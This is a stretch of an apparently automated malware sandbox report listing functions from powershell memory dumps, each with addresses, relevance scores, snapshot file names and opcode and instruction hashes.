                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48dac9943b16e71ade640034c3a218d279322209ff8be362cc6471f02b53cd13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B21102B2A2D99A4FE7B9EF3CD5606B47BE0EF4432474440B6E14DC75A2D918AD00CB41
                                                                                                                                                                                                                                              Function 00007FFB4AFAE380 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479245940.00007FFB4AFAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFAD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4afad000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d1e7ba2af180eae4eb6082aaa2aec84e3b8e3b7325b85298eb96f172371e45a9
                                                                                                                                                                                                                                              • Instruction ID: ed98031bcd5de16fcedb8ba7040e2429768978b9b2f5bd51cc11377a91eeded1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1e7ba2af180eae4eb6082aaa2aec84e3b8e3b7325b85298eb96f172371e45a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D341E2B180DBC44FEB569F38D8459923FB4EF56324B2905EFD088CB1A3D625A846C792
                                                                                                                                                                                                                                              Function 00007FFB4B0C9789 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c4931f0f361996029e0148676e3fa1847bf416b79c88133f6740012021e9052a
                                                                                                                                                                                                                                              • Instruction ID: b0679665aae51c1aba2834a6b64b8e52d1163c1fe69e310e749749f63a059a6e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4931f0f361996029e0148676e3fa1847bf416b79c88133f6740012021e9052a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B31A47191CB4C8FDB189F5CD84A6A97BE0FBA9311F00422FE449D3251CB70A855CBC6
                                                                                                                                                                                                                                              Function 00007FFB4B0CA47C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9747b83b08d42258f75d5555fb3e42e4d49b7c1fee9a9171de1786769431fc11
                                                                                                                                                                                                                                              • Instruction ID: 95708095b91d355651e19ddad2fae945afc8fdb087f5006796eb071942955d7c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9747b83b08d42258f75d5555fb3e42e4d49b7c1fee9a9171de1786769431fc11
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD21257090CB4C8FDB19DF68984A7E97BF0EB96321F04826BD048C3166DA74A406CB92
                                                                                                                                                                                                                                              Function 00007FFB4B0C9768 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4f0fc7076888e41ebaa3a2d13612f0e1ef149829f49533846f107a0f5eb4ef3b
                                                                                                                                                                                                                                              • Instruction ID: 95cad1dc6ce22ad3d75095e9dd01ced436d477940881d0fb6fe1dbeb4086e0b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0fc7076888e41ebaa3a2d13612f0e1ef149829f49533846f107a0f5eb4ef3b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F921D87191CB888FDB099F5CAC066A8BBE0FB55720F10C26FE59943291C734A956CBC7
                                                                                                                                                                                                                                              Function 00007FFB4B0C33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                              • Instruction ID: b4038a17c0b080827939cdfce65dc6e830082536f006395f6fcc1d7fd53910d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB01677111CB0C8FDB48EF0CE451AA5B7E0FB95364F10056EE58AC3661DB36E882CB45

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0C8995 Relevance: 5.1, Strings: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: O_^$O_^$O_^$O_^
                                                                                                                                                                                                                                              • API String ID: 0-934926442
                                                                                                                                                                                                                                              • Opcode ID: e97bee8a2d6858e40858ca90f1d727d9325e9236cfaee90b57efe202ec96874e
                                                                                                                                                                                                                                              • Instruction ID: 659f5efd6adff527bed533ba478f0b576371e0540bd2dab125f1047317efc6d5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e97bee8a2d6858e40858ca90f1d727d9325e9236cfaee90b57efe202ec96874e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8141A6D390E7C24FF36A5A3989A91A57FB0EF53216B0D42F7C1CD8E193EA1924068255
                                                                                                                                                                                                                                              Function 00007FFB4B0C8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: O_^4$O_^7$O_^F$O_^J
                                                                                                                                                                                                                                              • API String ID: 0-875994666
                                                                                                                                                                                                                                              • Opcode ID: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                                                                                                                                                                                              • Instruction ID: 01e918b4555d4c27ee66c542a0dad93915b3d2c6ffb24e6bf11bc7209ca09835
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 342104BB6192268ED2027B7DF8489D93764CFD523735502B2D19E8F243E914708B8AA4

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B1A63F7 Relevance: 8.0, Strings: 6, Instructions: 537COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-645840614
                                                                                                                                                                                                                                              • Opcode ID: 7547e2c5261f423220d165029e74f33183f4fba6a9ea1b1f638e65f108308a3d
                                                                                                                                                                                                                                              • Instruction ID: d222f9c6539de9c34f2242533cfe5d6a10955ecfc24eec8b8fb43014b2c1e2dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7547e2c5261f423220d165029e74f33183f4fba6a9ea1b1f638e65f108308a3d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F149A291EBCA4FE796AB7888251B57FE0EF5A214B1840FFD18DC70E3D918AC05C751
                                                                                                                                                                                                                                              Function 00007FFB4B1A6651 Relevance: 7.9, Strings: 6, Instructions: 355COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-645840614
                                                                                                                                                                                                                                              • Opcode ID: f6ff4fbf97d15ff9b32a6a31c81f381a8b1c0f20956b3fdccc292f4623d8a7cd
                                                                                                                                                                                                                                              • Instruction ID: a5dbd053a42a0570a9b5831dd927a28954129cd8cae3e663da4ee7a23c0445e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6ff4fbf97d15ff9b32a6a31c81f381a8b1c0f20956b3fdccc292f4623d8a7cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32B136E282EB894FE7A6EE78C855179BAD0EF1A718F0401FED54CCB0A3D918BC058751
                                                                                                                                                                                                                                              Function 00007FFB4B1A640E Relevance: 6.5, Strings: 5, Instructions: 291COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-538695617
                                                                                                                                                                                                                                              • Opcode ID: d5dcbe855fbd7cafc6c824da56c89ce6e385568e9f95e654f15988e983f8c55d
                                                                                                                                                                                                                                              • Instruction ID: 7952863226e5618fc03d532a3c96a3b42b2314d2d91b0af8db31eafa931e5c73
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5dcbe855fbd7cafc6c824da56c89ce6e385568e9f95e654f15988e983f8c55d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6A1079281E7C24FE793ABB889651647FE1AF1B614B5940FFC189CB0E3D90CAC09C752
                                                                                                                                                                                                                                              Function 00007FFB4B1A6515 Relevance: 6.5, Strings: 5, Instructions: 219COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-538695617
                                                                                                                                                                                                                                              • Opcode ID: e2d4e88351f5ebb971ca383c0159f85801d2e7c85317a2067d7785a2791012ec
                                                                                                                                                                                                                                              • Instruction ID: deda91c67b285722a15a2be85fed9e6f26b55b39f08f08514051d150c65330ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d4e88351f5ebb971ca383c0159f85801d2e7c85317a2067d7785a2791012ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B7109E292EBC64FE796EE78C565138BAD1AF19608B5840FEC14DCB0E7DD18BC058741
                                                                                                                                                                                                                                              Function 00007FFB4B1A6605 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K
                                                                                                                                                                                                                                              • API String ID: 0-2534900230
                                                                                                                                                                                                                                              • Opcode ID: e09fe578d8b019c6e21d1516ec0a03e8f56a5ec9e4b05bd9d30fd6a030fea975
                                                                                                                                                                                                                                              • Instruction ID: 609b59d4730d83bdea455b009a453532df39244b6ca1e4d235a812d3aaf2e129
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e09fe578d8b019c6e21d1516ec0a03e8f56a5ec9e4b05bd9d30fd6a030fea975
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 342126B290E7898FE752EB78C5941B8BBA0EF0D218B2840FFC58DCB093C9186805C741
                                                                                                                                                                                                                                              Function 00007FFB4B1A6630 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K
                                                                                                                                                                                                                                              • API String ID: 0-2534900230
                                                                                                                                                                                                                                              • Opcode ID: 03ea53cefe845ef0282648fdd9e6b00433c33c56529ab44a75f4eb7569e80798
                                                                                                                                                                                                                                              • Instruction ID: b5b83a13130a6a7cf50b68805e33b34aa3847d22c2dca8cc1cf4abf24a183cb9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03ea53cefe845ef0282648fdd9e6b00433c33c56529ab44a75f4eb7569e80798
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A811EBA290EBC84FE757EBB89494178BFE1EF5E214B1841FFC58DC70A3D81868098751
                                                                                                                                                                                                                                              Function 00007FFB4B0D9780 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1622661229.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b0d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0451bf23e6664735d351fc6d75dcaf078bcf9517b5fb98b60c7f0c5e19127863
                                                                                                                                                                                                                                              • Instruction ID: f1ae12f6583a24c46eb581cbf8a5fe46126a78a8135b4145c425cbf3fa8b4cd5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0451bf23e6664735d351fc6d75dcaf078bcf9517b5fb98b60c7f0c5e19127863
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9831E97191CB884FDB199F5CDC4A6A97BF0FB99311F04426FE449C3292CA70A815CBC2
                                                                                                                                                                                                                                              Function 00007FFB4AFBE380 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1621865154.00007FFB4AFBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFBD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4afbd000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 48adb3ae58959584711398820940bfd65e66184bb82f63d4d95e1276fe8b1691
                                                                                                                                                                                                                                              • Instruction ID: 994f124d6c33b305c35a18fc1cac0c44fd5a1fb7d44320a20700f3acaec8fd3b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48adb3ae58959584711398820940bfd65e66184bb82f63d4d95e1276fe8b1691
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4341F4B180DBC44FE7569F39D8419523FB4EF66314B2905EFD088CB1E3D625A806C792
                                                                                                                                                                                                                                              Function 00007FFB4B0DA49C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1622661229.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b0d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 16f9cce630cdf913591870446d472f0126b26c76cbf01628f81edd21834a91ff
                                                                                                                                                                                                                                              • Instruction ID: 57ca89d63ccdad1dfc67c9f6302a2ce1dc92bd44ffbcbe33d1ae6f9e48518736
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16f9cce630cdf913591870446d472f0126b26c76cbf01628f81edd21834a91ff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A221F57190CB4C4FDB59DF6C984A6E97FF0EB96321F04816BD048C31A2D674A806CB92
                                                                                                                                                                                                                                              Function 00007FFB4B0D33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1622661229.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b0d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                              • Instruction ID: 5b50c1841ec65c45ecec8c5871e2b834b4f1bec8952203c5b1954d009c1bf971
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6401677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC36A1DA36E882CB45
                                                                                                                                                                                                                                              Function 00007FFB4B0DA0FB Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1622661229.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b0d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6214b1d716694d6e4b8b5083bff9eaf5b47569281548bd500c3153fdbb42dde8
                                                                                                                                                                                                                                              • Instruction ID: 35af2710b2763af43037c3edd60cc537d5c152ac8c723cdab03f573d1474b9fa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6214b1d716694d6e4b8b5083bff9eaf5b47569281548bd500c3153fdbb42dde8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF0C87A509A8C4FD781EF3CD8594D57B90FFA5211B0441BBD749C7171DB215804C781
                                                                                                                                                                                                                                              Function 00007FFB4B1A4148 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b35abc5143a5803506904fe54909998a02773416216a1be525611f118eeecbd2
                                                                                                                                                                                                                                              • Instruction ID: 97ce25f97949a8274b98061e2aece6b5d960a812928d024dea04c6b639062e96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b35abc5143a5803506904fe54909998a02773416216a1be525611f118eeecbd2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91F0F072A0CA058FE76AEB2CE4414A477E0EF58320B0000B6E15CC7463DA29FC41CB80
                                                                                                                                                                                                                                              Function 00007FFB4B1A43FB Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 61d2530efee429b947e71ff733958cb5d49e1df33d95a6bcbe8220975208d9da
                                                                                                                                                                                                                                              • Instruction ID: bb54e118a6231751a2bb35520be2b04a48e14c35ece747f528006d26fab5b955
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61d2530efee429b947e71ff733958cb5d49e1df33d95a6bcbe8220975208d9da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEF09AB2A0C6458FDB65EB2CE4418A8B7E4FF49324B0100F6E15DCB463DA2AFC41CB50
                                                                                                                                                                                                                                              Function 00007FFB4B1A41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                              • Instruction ID: 5abeccf5ca9d81291b7b49f04404ae65abc33b164fc7b89f929d1799c1180446
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE01A31B1C808CFEB68EE0CE1419A977E1EFA832571141B7D24EC7971CA22FC518B80

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0D8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1622661229.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b0d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                                                                                                                                                                                              • API String ID: 0-2388461625
                                                                                                                                                                                                                                              • Opcode ID: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                                                                                                                                                                                                              • Instruction ID: 61ca0c743a732bcefa7530f398d98e3e2b903c8aec01632c87c4d4e3b0526e39
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 982149B3A096118AC3023BBCFC959D83BA5DF5537935501F3E618CF113CD24648B8796

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B1C6605 Relevance: 7.9, Strings: 6, Instructions: 445COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
